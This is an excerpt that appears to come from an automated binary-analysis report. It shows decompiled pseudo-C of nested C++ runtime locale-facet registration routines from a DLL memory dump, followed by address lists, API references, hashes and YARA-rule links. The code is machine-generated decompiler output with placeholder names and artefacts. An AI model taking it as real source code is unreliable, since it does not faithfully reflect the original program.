													E6E161CB5(__eflags);
													asm("int3");
													E6E1A9DBF(0x6e1ec3ec, _t395, _t526, _t541, 8);
													E6E18F2A5(_t568 - 0x14, 0);
													_t542 =  *0x6e22172c; // 0x0
													 *(_t568 - 4) =  *(_t568 - 4) & 0x00000000;
													 *(_t568 - 0x10) = _t542;
													_t527 = E6E162171( *((intOrPtr*)(_t568 + 8)), E6E161F29(_t395, 0x6e2216d8, _t526, _t542));
													__eflags = _t527;
													if(_t527 != 0) {
														L26:
														E6E18F30C(_t568 - 0x14);
														return E6E1A9D88(_t527);
													} else {
														__eflags = _t542;
														if(_t542 == 0) {
															_push( *((intOrPtr*)(_t568 + 8)));
															_push(_t568 - 0x10);
															__eflags = E6E19ADF7(_t395, _t527, _t542) - 0xffffffff;
															if(__eflags == 0) {
																E6E161CB5(__eflags);
																asm("int3");
																E6E1A9DBF(0x6e1ec3ec, _t395, _t527, _t542, 8);
																E6E18F2A5(_t568 - 0x14, 0);
																_t543 =  *0x6e221700; // 0x0
																 *(_t568 - 4) =  *(_t568 - 4) & 0x00000000;
																 *(_t568 - 0x10) = _t543;
																_t528 = E6E162171( *((intOrPtr*)(_t568 + 8)), E6E161F29(_t395, 0x6e2216b4, _t527, _t543));
																__eflags = _t528;
																if(_t528 != 0) {
																	L33:
																	E6E18F30C(_t568 - 0x14);
																	return E6E1A9D88(_t528);
																} else {
																	__eflags = _t543;
																	if(_t543 == 0) {
																		_push( *((intOrPtr*)(_t568 + 8)));
																		_push(_t568 - 0x10);
																		__eflags = E6E19AE7C(_t395, _t528, _t543) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E161CB5(__eflags);
																			asm("int3");
																			E6E1A9DBF(0x6e1ec3ec, _t395, _t528, _t543, 8);
																			E6E18F2A5(_t568 - 0x14, 0);
																			_t544 =  *0x6e2216fc; // 0x0
																			 *(_t568 - 4) =  *(_t568 - 4) & 0x00000000;
																			 *(_t568 - 0x10) = _t544;
																			_t529 = E6E162171( *((intOrPtr*)(_t568 + 8)), E6E161F29(_t395, 0x6e2216b0, _t528, _t544));
																			__eflags = _t529;
																			if(_t529 != 0) {
																				L40:
																				E6E18F30C(_t568 - 0x14);
																				return E6E1A9D88(_t529);
																			} else {
																				__eflags = _t544;
																				if(_t544 == 0) {
																					_push( *((intOrPtr*)(_t568 + 8)));
																					_push(_t568 - 0x10);
																					__eflags = E6E19AF00(_t395, _t529, _t544) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E161CB5(__eflags);
																						asm("int3");
																						E6E1A9DBF(0x6e1ec3ec, _t395, _t529, _t544, 8);
																						E6E18F2A5(_t568 - 0x14, 0);
																						_t545 =  *0x6e221710; // 0x0
																						 *(_t568 - 4) =  *(_t568 - 4) & 0x00000000;
																						 *(_t568 - 0x10) = _t545;
																						_t530 = E6E162171( *((intOrPtr*)(_t568 + 8)), E6E161F29(_t395, 0x6e2216bc, _t529, _t545));
																						__eflags = _t530;
																						if(_t530 != 0) {
																							L47:
																							E6E18F30C(_t568 - 0x14);
																							return E6E1A9D88(_t530);
																						} else {
																							__eflags = _t545;
																							if(_t545 == 0) {
																								_push( *((intOrPtr*)(_t568 + 8)));
																								_push(_t568 - 0x10);
																								__eflags = E6E19AF85(_t395, _t530, _t545) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E161CB5(__eflags);
																									asm("int3");
																									E6E1A9DBF(0x6e1ec3ec, _t395, _t530, _t545, 8);
																									E6E18F2A5(_t568 - 0x14, 0);
																									_t546 =  *0x6e2216e8; // 0x0
																									 *(_t568 - 4) =  *(_t568 - 4) & 0x00000000;
																									 *(_t568 - 0x10) = _t546;
																									_t531 = E6E162171( *((intOrPtr*)(_t568 + 8)), E6E161F29(_t395, 0x6e22169c, _t530, _t546));
																									__eflags = _t531;
																									if(_t531 != 0) {
																										L54:
																										E6E18F30C(_t568 - 0x14);
																										return E6E1A9D88(_t531);
																									} else {
																										__eflags = _t546;
																										if(_t546 == 0) {
																											_push( *((intOrPtr*)(_t568 + 8)));
																											_push(_t568 - 0x10);
																											__eflags = E6E19AFED(_t395, _t531, _t546) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E161CB5(__eflags);
																												asm("int3");
																												E6E1A9DBF(0x6e1ec3ec, _t395, _t531, _t546, 8);
																												E6E18F2A5(_t568 - 0x14, 0);
																												_t547 =  *0x6e221714; // 0x0
																												 *(_t568 - 4) =  *(_t568 - 4) & 0x00000000;
																												 *(_t568 - 0x10) = _t547;
																												_t532 = E6E162171( *((intOrPtr*)(_t568 + 8)), E6E161F29(_t395, 0x6e2216c0, _t531, _t547));
																												__eflags = _t532;
																												if(_t532 != 0) {
																													L61:
																													E6E18F30C(_t568 - 0x14);
																													return E6E1A9D88(_t532);
																												} else {
																													__eflags = _t547;
																													if(_t547 == 0) {
																														_push( *((intOrPtr*)(_t568 + 8)));
																														_push(_t568 - 0x10);
																														__eflags = E6E19B055(_t395, _t532, _t547) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E161CB5(__eflags);
																															asm("int3");
																															E6E1A9DBF(0x6e1ec3ec, _t395, _t532, _t547, 8);
																															E6E18F2A5(_t568 - 0x14, 0);
																															_t548 =  *0x6e221718; // 0x0
																															 *(_t568 - 4) =  *(_t568 - 4) & 0x00000000;
																															 *(_t568 - 0x10) = _t548;
																															_t533 = E6E162171( *((intOrPtr*)(_t568 + 8)), E6E161F29(_t395, 0x6e2216c4, _t532, _t548));
																															__eflags = _t533;
																															if(_t533 != 0) {
																																L68:
																																E6E18F30C(_t568 - 0x14);
																																return E6E1A9D88(_t533);
																															} else {
																																__eflags = _t548;
																																if(_t548 == 0) {
																																	_push( *((intOrPtr*)(_t568 + 8)));
																																	_push(_t568 - 0x10);
																																	__eflags = E6E19B0BD(_t395, _t533, _t548) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E161CB5(__eflags);
																																		asm("int3");
																																		E6E1A9DBF(0x6e1ec3ec, _t395, _t533, _t548, 8);
																																		E6E18F2A5(_t568 - 0x14, 0);
																																		_t549 =  *0x6e221734; // 0x0
																																		 *(_t568 - 4) =  *(_t568 - 4) & 0x00000000;
																																		 *(_t568 - 0x10) = _t549;
																																		_t534 = E6E162171( *((intOrPtr*)(_t568 + 8)), E6E161F29(_t395, 0x6e2216e0, _t533, _t549));
																																		__eflags = _t534;
																																		if(_t534 != 0) {
																																			L75:
																																			E6E18F30C(_t568 - 0x14);
																																			return E6E1A9D88(_t534);
																																		} else {
																																			__eflags = _t549;
																																			if(_t549 == 0) {
																																				_push( *((intOrPtr*)(_t568 + 8)));
																																				_push(_t568 - 0x10);
																																				__eflags = E6E19B138(_t395, _t534, _t549) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E161CB5(__eflags);
																																					asm("int3");
																																					E6E1A9DBF(0x6e1ec3ec, _t395, _t534, _t549, 8);
																																					E6E18F2A5(_t568 - 0x14, 0);
																																					_t550 =  *0x6e221704; // 0x0
																																					 *(_t568 - 4) =  *(_t568 - 4) & 0x00000000;
																																					 *(_t568 - 0x10) = _t550;
																																					_t535 = E6E162171( *((intOrPtr*)(_t568 + 8)), E6E161F29(_t395, 0x6e2216b8, _t534, _t550));
																																					__eflags = _t535;
																																					if(_t535 != 0) {
																																						L82:
																																						E6E18F30C(_t568 - 0x14);
																																						return E6E1A9D88(_t535);
																																					} else {
																																						__eflags = _t550;
																																						if(_t550 == 0) {
																																							_push( *((intOrPtr*)(_t568 + 8)));
																																							_push(_t568 - 0x10);
																																							__eflags = E6E19B1A4(_t395, _t535, _t550) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E161CB5(__eflags);
																																								asm("int3");
																																								E6E1A9DBF(0x6e1ec3ec, _t395, _t535, _t550, 8);
																																								E6E18F2A5(_t568 - 0x14, 0);
																																								_t551 =  *0x6e221738; // 0x0
																																								 *(_t568 - 4) =  *(_t568 - 4) & 0x00000000;
																																								 *(_t568 - 0x10) = _t551;
																																								_t536 = E6E162171( *((intOrPtr*)(_t568 + 8)), E6E161F29(_t395, 0x6e2216e4, _t535, _t551));
																																								__eflags = _t536;
																																								if(_t536 != 0) {
																																									L89:
																																									E6E18F30C(_t568 - 0x14);
																																									return E6E1A9D88(_t536);
																																								} else {
																																									__eflags = _t551;
																																									if(_t551 == 0) {
																																										_push( *((intOrPtr*)(_t568 + 8)));
																																										_push(_t568 - 0x10);
																																										__eflags = E6E19B210(_t395, _t536, _t551) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E161CB5(__eflags);
																																											asm("int3");
																																											E6E1A9DBF(0x6e1ec3ec, _t395, _t536, _t551, 8);
																																											E6E18F2A5(_t568 - 0x14, 0);
																																											_t552 =  *0x6e221708; // 0x0
																																											 *(_t568 - 4) =  *(_t568 - 4) & 0x00000000;
																																											 *(_t568 - 0x10) = _t552;
																																											_t537 = E6E162171( *((intOrPtr*)(_t568 + 8)), E6E161F29(_t395, 0x6e221698, _t536, _t552));
																																											__eflags = _t537;
																																											if(_t537 != 0) {
																																												L96:
																																												E6E18F30C(_t568 - 0x14);
																																												return E6E1A9D88(_t537);
																																											} else {
																																												__eflags = _t552;
																																												if(_t552 == 0) {
																																													_push( *((intOrPtr*)(_t568 + 8)));
																																													_push(_t568 - 0x10);
																																													_t330 = E6E19B284(_t395, _t537, _t552);
																																													_pop(_t479);
																																													__eflags = _t330 - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E161CB5(__eflags);
																																														asm("int3");
																																														E6E1A9DBF(0x6e1ecb1a, _t395, _t537, _t552, 4);
																																														_t553 = _t479;
																																														 *(_t568 - 0x10) = _t553;
																																														 *((intOrPtr*)(_t553 + 4)) =  *((intOrPtr*)(_t568 + 0xc));
																																														_push( *((intOrPtr*)(_t568 + 0x14)));
																																														_t175 = _t568 - 4;
																																														 *_t175 =  *(_t568 - 4) & 0x00000000;
																																														__eflags =  *_t175;
																																														 *_t553 = 0x6e1f225c;
																																														 *((char*)(_t553 + 0x28)) =  *((intOrPtr*)(_t568 + 0x10));
																																														E6E19F3D8(_t395, _t479, _t522, _t537, _t553,  *_t175);
																																														return E6E1A9D88(_t553,  *((intOrPtr*)(_t568 + 8)));
																																													} else {
																																														_t537 =  *(_t568 - 0x10);
																																														 *(_t568 - 0x10) = _t537;
																																														 *(_t568 - 4) = 1;
																																														E6E1911C1(__eflags, _t537);
																																														 *0x6e1ee1b4();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t537 + 4))))();
																																														 *0x6e221708 = _t537;
																																														goto L96;
																																													}
																																												} else {
																																													_t537 = _t552;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t536 =  *(_t568 - 0x10);
																																											 *(_t568 - 0x10) = _t536;
																																											 *(_t568 - 4) = 1;
																																											E6E1911C1(__eflags, _t536);
																																											 *0x6e1ee1b4();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t536 + 4))))();
																																											 *0x6e221738 = _t536;
																																											goto L89;
																																										}
																																									} else {
																																										_t536 = _t551;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t535 =  *(_t568 - 0x10);
																																								 *(_t568 - 0x10) = _t535;
																																								 *(_t568 - 4) = 1;
																																								E6E1911C1(__eflags, _t535);
																																								 *0x6e1ee1b4();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t535 + 4))))();
																																								 *0x6e221704 = _t535;
																																								goto L82;
																																							}
																																						} else {
																																							_t535 = _t550;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t534 =  *(_t568 - 0x10);
																																					 *(_t568 - 0x10) = _t534;
																																					 *(_t568 - 4) = 1;
																																					E6E1911C1(__eflags, _t534);
																																					 *0x6e1ee1b4();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t534 + 4))))();
																																					 *0x6e221734 = _t534;
																																					goto L75;
																																				}
																																			} else {
																																				_t534 = _t549;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t533 =  *(_t568 - 0x10);
																																		 *(_t568 - 0x10) = _t533;
																																		 *(_t568 - 4) = 1;
																																		E6E1911C1(__eflags, _t533);
																																		 *0x6e1ee1b4();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t533 + 4))))();
																																		 *0x6e221718 = _t533;
																																		goto L68;
																																	}
																																} else {
																																	_t533 = _t548;
																																	goto L68;
																																}
																															}
																														} else {
																															_t532 =  *(_t568 - 0x10);
																															 *(_t568 - 0x10) = _t532;
																															 *(_t568 - 4) = 1;
																															E6E1911C1(__eflags, _t532);
																															 *0x6e1ee1b4();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t532 + 4))))();
																															 *0x6e221714 = _t532;
																															goto L61;
																														}
																													} else {
																														_t532 = _t547;
																														goto L61;
																													}
																												}
																											} else {
																												_t531 =  *(_t568 - 0x10);
																												 *(_t568 - 0x10) = _t531;
																												 *(_t568 - 4) = 1;
																												E6E1911C1(__eflags, _t531);
																												 *0x6e1ee1b4();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t531 + 4))))();
																												 *0x6e2216e8 = _t531;
																												goto L54;
																											}
																										} else {
																											_t531 = _t546;
																											goto L54;
																										}
																									}
																								} else {
																									_t530 =  *(_t568 - 0x10);
																									 *(_t568 - 0x10) = _t530;
																									 *(_t568 - 4) = 1;
																									E6E1911C1(__eflags, _t530);
																									 *0x6e1ee1b4();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t530 + 4))))();
																									 *0x6e221710 = _t530;
																									goto L47;
																								}
																							} else {
																								_t530 = _t545;
																								goto L47;
																							}
																						}
																					} else {
																						_t529 =  *(_t568 - 0x10);
																						 *(_t568 - 0x10) = _t529;
																						 *(_t568 - 4) = 1;
																						E6E1911C1(__eflags, _t529);
																						 *0x6e1ee1b4();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t529 + 4))))();
																						 *0x6e2216fc = _t529;
																						goto L40;
																					}
																				} else {
																					_t529 = _t544;
																					goto L40;
																				}
																			}
																		} else {
																			_t528 =  *(_t568 - 0x10);
																			 *(_t568 - 0x10) = _t528;
																			 *(_t568 - 4) = 1;
																			E6E1911C1(__eflags, _t528);
																			 *0x6e1ee1b4();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t528 + 4))))();
																			 *0x6e221700 = _t528;
																			goto L33;
																		}
																	} else {
																		_t528 = _t543;
																		goto L33;
																	}
																}
															} else {
																_t527 =  *(_t568 - 0x10);
																 *(_t568 - 0x10) = _t527;
																 *(_t568 - 4) = 1;
																E6E1911C1(__eflags, _t527);
																 *0x6e1ee1b4();
																 *((intOrPtr*)( *((intOrPtr*)( *_t527 + 4))))();
																 *0x6e22172c = _t527;
																goto L26;
															}
														} else {
															_t527 = _t542;
															goto L26;
														}
													}
												} else {
													_t526 =  *(_t568 - 0x10);
													 *(_t568 - 0x10) = _t526;
													 *(_t568 - 4) = 1;
													E6E1911C1(__eflags, _t526);
													 *0x6e1ee1b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t526 + 4))))();
													 *0x6e221730 = _t526;
													goto L19;
												}
											} else {
												_t526 = _t541;
												goto L19;
											}
										}
									} else {
										_t525 =  *(_t568 - 0x10);
										 *(_t568 - 0x10) = _t525;
										 *(_t568 - 4) = 1;
										E6E1911C1(__eflags, _t525);
										 *0x6e1ee1b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t525 + 4))))();
										 *0x6e2216f8 = _t525;
										goto L12;
									}
								} else {
									_t525 = _t540;
									goto L12;
								}
							}
						} else {
							_t524 =  *(_t568 - 0x10);
							 *(_t568 - 0x10) = _t524;
							 *(_t568 - 4) = 1;
							E6E1911C1(__eflags, _t524);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t524 + 4))))();
							 *0x6e221728 = _t524;
							goto L5;
						}
					} else {
						_t524 = _t539;
						goto L5;
					}
				}
			}

0x6e199120
0x6e199127
0x6e199131
0x6e199136
0x6e199141
0x6e199145
0x6e199151
0x6e199156
0x6e19915a
0x6e19919f
0x6e1991a2
0x6e1991ae
0x6e19915c
0x6e19915e
0x6e199164
0x6e19916a
0x6e199172
0x6e199175
0x6e1991af
0x6e1991b4
0x6e1991bc
0x6e1991c6
0x6e1991cb
0x6e1991d6
0x6e1991da
0x6e1991eb
0x6e1991ed
0x6e1991ef
0x6e199234
0x6e199237
0x6e199243
0x6e1991f1
0x6e1991f1
0x6e1991f3
0x6e1991f9
0x6e1991ff
0x6e199207
0x6e19920a
0x6e199244
0x6e199249
0x6e199251
0x6e19925b
0x6e199260
0x6e19926b
0x6e19926f
0x6e199280
0x6e199282
0x6e199284
0x6e1992c9
0x6e1992cc
0x6e1992d8
0x6e199286
0x6e199286
0x6e199288
0x6e19928e
0x6e199294
0x6e19929c
0x6e19929f
0x6e1992d9
0x6e1992de
0x6e1992e6
0x6e1992f0
0x6e1992f5
0x6e199300
0x6e199304
0x6e199315
0x6e199317
0x6e199319
0x6e19935e
0x6e199361
0x6e19936d
0x6e19931b
0x6e19931b
0x6e19931d
0x6e199323
0x6e199329
0x6e199331
0x6e199334
0x6e19936e
0x6e199373
0x6e19937b
0x6e199385
0x6e19938a
0x6e199395
0x6e199399
0x6e1993aa
0x6e1993ac
0x6e1993ae
0x6e1993f3
0x6e1993f6
0x6e199402
0x6e1993b0
0x6e1993b0
0x6e1993b2
0x6e1993b8
0x6e1993be
0x6e1993c6
0x6e1993c9
0x6e199403
0x6e199408
0x6e199410
0x6e19941a
0x6e19941f
0x6e19942a
0x6e19942e
0x6e19943f
0x6e199441
0x6e199443
0x6e199488
0x6e19948b
0x6e199497
0x6e199445
0x6e199445
0x6e199447
0x6e19944d
0x6e199453
0x6e19945b
0x6e19945e
0x6e199498
0x6e19949d
0x6e1994a5
0x6e1994af
0x6e1994b4
0x6e1994bf
0x6e1994c3
0x6e1994d4
0x6e1994d6
0x6e1994d8
0x6e19951d
0x6e199520
0x6e19952c
0x6e1994da
0x6e1994da
0x6e1994dc
0x6e1994e2
0x6e1994e8
0x6e1994f0
0x6e1994f3
0x6e19952d
0x6e199532
0x6e19953a
0x6e199544
0x6e199549
0x6e199554
0x6e199558
0x6e199569
0x6e19956b
0x6e19956d
0x6e1995b2
0x6e1995b5
0x6e1995c1
0x6e19956f
0x6e19956f
0x6e199571
0x6e199577
0x6e19957d
0x6e199585
0x6e199588
0x6e1995c2
0x6e1995c7
0x6e1995cf
0x6e1995d9
0x6e1995de
0x6e1995e9
0x6e1995ed
0x6e1995fe
0x6e199600
0x6e199602
0x6e199647
0x6e19964a
0x6e199656
0x6e199604
0x6e199604
0x6e199606
0x6e19960c
0x6e199612
0x6e19961a
0x6e19961d
0x6e199657
0x6e19965c
0x6e199664
0x6e19966e
0x6e199673
0x6e19967e
0x6e199682
0x6e199693
0x6e199695
0x6e199697
0x6e1996dc
0x6e1996df
0x6e1996eb
0x6e199699
0x6e199699
0x6e19969b
0x6e1996a1
0x6e1996a7
0x6e1996af
0x6e1996b2
0x6e1996ec
0x6e1996f1
0x6e1996f9
0x6e199703
0x6e199708
0x6e199713
0x6e199717
0x6e199728
0x6e19972a
0x6e19972c
0x6e199771
0x6e199774
0x6e199780
0x6e19972e
0x6e19972e
0x6e199730
0x6e199736
0x6e19973c
0x6e199744
0x6e199747
0x6e199781
0x6e199786
0x6e19978e
0x6e199798
0x6e19979d
0x6e1997a8
0x6e1997ac
0x6e1997bd
0x6e1997bf
0x6e1997c1
0x6e199806
0x6e199809
0x6e199815
0x6e1997c3
0x6e1997c3
0x6e1997c5
0x6e1997cb
0x6e1997d1
0x6e1997d9
0x6e1997dc
0x6e199816
0x6e19981b
0x6e199823
0x6e19982d
0x6e199832
0x6e19983d
0x6e199841
0x6e199852
0x6e199854
0x6e199856
0x6e19989b
0x6e19989e
0x6e1998aa
0x6e199858
0x6e199858
0x6e19985a
0x6e199860
0x6e199866
0x6e19986e
0x6e199871
0x6e1998ab
0x6e1998b0
0x6e1998b8
0x6e1998c2
0x6e1998c7
0x6e1998d2
0x6e1998d6
0x6e1998e7
0x6e1998e9
0x6e1998eb
0x6e199930
0x6e199933
0x6e19993f
0x6e1998ed
0x6e1998ed
0x6e1998ef
0x6e1998f5
0x6e1998fb
0x6e1998fc
0x6e199902
0x6e199903
0x6e199906
0x6e199940
0x6e199945
0x6e19994d
0x6e199952
0x6e199954
0x6e19995a
0x6e19995d
0x6e199966
0x6e199966
0x6e199966
0x6e19996a
0x6e199970
0x6e199973
0x6e19997f
0x6e199908
0x6e199908
0x6e19990b
0x6e19990f
0x6e199913
0x6e199920
0x6e199928
0x6e19992a
0x00000000
0x6e19992a
0x6e1998f1
0x6e1998f1
0x00000000
0x6e1998f1
0x6e1998ef
0x6e199873
0x6e199873
0x6e199876
0x6e19987a
0x6e19987e
0x6e19988b
0x6e199893
0x6e199895
0x00000000
0x6e199895
0x6e19985c
0x6e19985c
0x00000000
0x6e19985c
0x6e19985a
0x6e1997de
0x6e1997de
0x6e1997e1
0x6e1997e5
0x6e1997e9
0x6e1997f6
0x6e1997fe
0x6e199800
0x00000000
0x6e199800
0x6e1997c7
0x6e1997c7
0x00000000
0x6e1997c7
0x6e1997c5
0x6e199749
0x6e199749
0x6e19974c
0x6e199750
0x6e199754
0x6e199761
0x6e199769
0x6e19976b
0x00000000
0x6e19976b
0x6e199732
0x6e199732
0x00000000
0x6e199732
0x6e199730
0x6e1996b4
0x6e1996b4
0x6e1996b7
0x6e1996bb
0x6e1996bf
0x6e1996cc
0x6e1996d4
0x6e1996d6
0x00000000
0x6e1996d6
0x6e19969d
0x6e19969d
0x00000000
0x6e19969d
0x6e19969b
0x6e19961f
0x6e19961f
0x6e199622
0x6e199626
0x6e19962a
0x6e199637
0x6e19963f
0x6e199641
0x00000000
0x6e199641
0x6e199608
0x6e199608
0x00000000
0x6e199608
0x6e199606
0x6e19958a
0x6e19958a
0x6e19958d
0x6e199591
0x6e199595
0x6e1995a2
0x6e1995aa
0x6e1995ac
0x00000000
0x6e1995ac
0x6e199573
0x6e199573
0x00000000
0x6e199573
0x6e199571
0x6e1994f5
0x6e1994f5
0x6e1994f8
0x6e1994fc
0x6e199500
0x6e19950d
0x6e199515
0x6e199517
0x00000000
0x6e199517
0x6e1994de
0x6e1994de
0x00000000
0x6e1994de
0x6e1994dc
0x6e199460
0x6e199460
0x6e199463
0x6e199467
0x6e19946b
0x6e199478
0x6e199480
0x6e199482
0x00000000
0x6e199482
0x6e199449
0x6e199449
0x00000000
0x6e199449
0x6e199447
0x6e1993cb
0x6e1993cb
0x6e1993ce
0x6e1993d2
0x6e1993d6
0x6e1993e3
0x6e1993eb
0x6e1993ed
0x00000000
0x6e1993ed
0x6e1993b4
0x6e1993b4
0x00000000
0x6e1993b4
0x6e1993b2
0x6e199336
0x6e199336
0x6e199339
0x6e19933d
0x6e199341
0x6e19934e
0x6e199356
0x6e199358
0x00000000
0x6e199358
0x6e19931f
0x6e19931f
0x00000000
0x6e19931f
0x6e19931d
0x6e1992a1
0x6e1992a1
0x6e1992a4
0x6e1992a8
0x6e1992ac
0x6e1992b9
0x6e1992c1
0x6e1992c3
0x00000000
0x6e1992c3
0x6e19928a
0x6e19928a
0x00000000
0x6e19928a
0x6e199288
0x6e19920c
0x6e19920c
0x6e19920f
0x6e199213
0x6e199217
0x6e199224
0x6e19922c
0x6e19922e
0x00000000
0x6e19922e
0x6e1991f5
0x6e1991f5
0x00000000
0x6e1991f5
0x6e1991f3
0x6e199177
0x6e199177
0x6e19917a
0x6e19917e
0x6e199182
0x6e19918f
0x6e199197
0x6e199199
0x00000000
0x6e199199
0x6e199160
0x6e199160
0x00000000
0x6e199160
0x6e19915e

APIs

__EH_prolog3.LIBCMT ref: 6E199127
std::_Lockit::_Lockit.LIBCPMT ref: 6E199131

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E199182
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1991A2
Concurrency::cancel_current_task.LIBCPMT ref: 6E1991AF

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: 6b7fa05ac1516b04a7b8a26ed0c8254e640791c8133ebb0d9fbc31e8d381fb22
Instruction ID: c8bc42894fbf45b4e746cd9021823980d768bff9ae9d8a76996701db8287e144
Opcode Fuzzy Hash: 6b7fa05ac1516b04a7b8a26ed0c8254e640791c8133ebb0d9fbc31e8d381fb22
Instruction Fuzzy Hash: 7101A135A005159FCF05DBE4D8246FE77A9BF84324F244819E815AB280CF719EC5BB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1991B5, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E1991B5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t170;
				void* _t307;
				signed int _t446;
				void* _t486;
				signed int _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				signed int _t494;
				signed int _t495;
				signed int _t496;
				signed int _t497;
				signed int _t498;
				signed int _t499;
				signed int _t500;
				signed int _t502;
				signed int _t503;
				signed int _t504;
				signed int _t505;
				signed int _t506;
				signed int _t507;
				signed int _t508;
				signed int _t509;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				void* _t529;

				_t368 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t529 - 0x14, 0);
				_t502 =  *0x6e2216f8; // 0x0
				 *(_t529 - 4) =  *(_t529 - 4) & 0x00000000;
				 *(_t529 - 0x10) = _t502;
				_t170 = E6E162171( *((intOrPtr*)(_t529 + 8)), E6E161F29(__ebx, 0x6e2216ac, __edi, _t502));
				_t488 = _t170;
				if(_t170 != 0) {
					L5:
					E6E18F30C(_t529 - 0x14);
					return E6E1A9D88(_t488);
				} else {
					if(_t502 == 0) {
						_push( *((intOrPtr*)(_t529 + 8)));
						_push(_t529 - 0x10);
						__eflags = E6E19AD0B(__ebx, _t488, _t502) - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							E6E1A9DBF(0x6e1ec3ec, _t368, _t488, _t502, 8);
							E6E18F2A5(_t529 - 0x14, 0);
							_t503 =  *0x6e221730; // 0x0
							 *(_t529 - 4) =  *(_t529 - 4) & 0x00000000;
							 *(_t529 - 0x10) = _t503;
							_t489 = E6E162171( *((intOrPtr*)(_t529 + 8)), E6E161F29(_t368, 0x6e2216dc, _t488, _t503));
							__eflags = _t489;
							if(_t489 != 0) {
								L12:
								E6E18F30C(_t529 - 0x14);
								return E6E1A9D88(_t489);
							} else {
								__eflags = _t503;
								if(_t503 == 0) {
									_push( *((intOrPtr*)(_t529 + 8)));
									_push(_t529 - 0x10);
									__eflags = E6E19AD73(_t368, _t489, _t503) - 0xffffffff;
									if(__eflags == 0) {
										E6E161CB5(__eflags);
										asm("int3");
										E6E1A9DBF(0x6e1ec3ec, _t368, _t489, _t503, 8);
										E6E18F2A5(_t529 - 0x14, 0);
										_t504 =  *0x6e22172c; // 0x0
										 *(_t529 - 4) =  *(_t529 - 4) & 0x00000000;
										 *(_t529 - 0x10) = _t504;
										_t490 = E6E162171( *((intOrPtr*)(_t529 + 8)), E6E161F29(_t368, 0x6e2216d8, _t489, _t504));
										__eflags = _t490;
										if(_t490 != 0) {
											L19:
											E6E18F30C(_t529 - 0x14);
											return E6E1A9D88(_t490);
										} else {
											__eflags = _t504;
											if(_t504 == 0) {
												_push( *((intOrPtr*)(_t529 + 8)));
												_push(_t529 - 0x10);
												__eflags = E6E19ADF7(_t368, _t490, _t504) - 0xffffffff;
												if(__eflags == 0) {
													E6E161CB5(__eflags);
													asm("int3");
													E6E1A9DBF(0x6e1ec3ec, _t368, _t490, _t504, 8);
													E6E18F2A5(_t529 - 0x14, 0);
													_t505 =  *0x6e221700; // 0x0
													 *(_t529 - 4) =  *(_t529 - 4) & 0x00000000;
													 *(_t529 - 0x10) = _t505;
													_t491 = E6E162171( *((intOrPtr*)(_t529 + 8)), E6E161F29(_t368, 0x6e2216b4, _t490, _t505));
													__eflags = _t491;
													if(_t491 != 0) {
														L26:
														E6E18F30C(_t529 - 0x14);
														return E6E1A9D88(_t491);
													} else {
														__eflags = _t505;
														if(_t505 == 0) {
															_push( *((intOrPtr*)(_t529 + 8)));
															_push(_t529 - 0x10);
															__eflags = E6E19AE7C(_t368, _t491, _t505) - 0xffffffff;
															if(__eflags == 0) {
																E6E161CB5(__eflags);
																asm("int3");
																E6E1A9DBF(0x6e1ec3ec, _t368, _t491, _t505, 8);
																E6E18F2A5(_t529 - 0x14, 0);
																_t506 =  *0x6e2216fc; // 0x0
																 *(_t529 - 4) =  *(_t529 - 4) & 0x00000000;
																 *(_t529 - 0x10) = _t506;
